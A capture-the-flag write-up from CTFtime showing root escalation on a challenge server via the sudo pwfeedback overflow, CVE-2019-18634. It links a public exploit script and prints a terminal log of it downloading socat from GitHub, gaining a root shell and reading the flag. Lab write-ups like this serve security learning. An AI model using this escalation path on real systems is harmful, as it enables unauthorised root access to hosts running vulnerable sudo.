CTFtime.org

Humpty Dumpty's SSH Account

by 8710xiq / PwnaSonic

Rating:

# Humpty Dumpty's SSH Account
by mito

## 33 Solves, 460pt

It's a challenge to read the flag after connecting to the server with `ssh` and elevating to `root privileges`.

```
$ ssh [email protected] -p 41701
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Warning: Security update available for a system command
humptydumpty@22edcaca289b:~$ ls -l
total 4
-r-------- 1 root root 38 Apr 17 01:58 flag
humptydumpty@22edcaca289b:~$
```

When we try to read the flag with the `sudo` command, the following message is displayed and the entered `password is displayed as *`.

```
humptydumpty@22edcaca289b:~$ sudo cat flag

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password: ****** <-- here
```

We found that the `sudo` command has changed.

```
humptydumpty@22edcaca289b:~$ which sudo
/usr/local/bin/sudo
humptydumpty@22edcaca289b:~$ ls -l /usr/local/bin/
total 664
-rwsr-xr-x 1 root root 519216 Apr 15 03:59 sudo
lrwxrwxrwx 1 root root 4 Apr 15 03:59 sudoedit -> sudo
-rwxr-xr-x 1 root root 157088 Apr 15 03:59 sudoreplay
```

Since the entered password is displayed, it may be `CVE-2019-18634` of sudo vulnerability.

We used the following exploit code.

[https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh](https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh)

After running the Exploit code, we were able to elevate to `root privileges`.

```
humptydumpty@22edcaca289b:/tmp$ vi exp.sh <-- https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh
humptydumpty@22edcaca289b:/tmp$ sh exp.sh
--2020-04-29 12:25:03-- https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.248.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.248.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat 100%[=============================>] 366.38K --.-KB/s in 0.07s

2020-04-29 12:25:03 (4.80 MB/s) - ‘socat’ saved [375176/375176]

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:
Sorry, try again.
Sorry, try again.
root@22edcaca289b:/tmp# exit
sudo: 2 incorrect password attempts
Exploiting!
root@22edcaca289b:/tmp# id
uid=0(root) gid=1000(humptydumpty) groups=1000(humptydumpty)
```

We were able to read the flag.

```
root@22edcaca289b:/tmp# cd /home/humptydumpty
root@22edcaca289b:/home/humptydumpty# ls
flag
root@22edcaca289b:/home/humptydumpty# cat flag
flag{7h3_vu1n!_i5?...CVE_2019-18634!}
```

Comments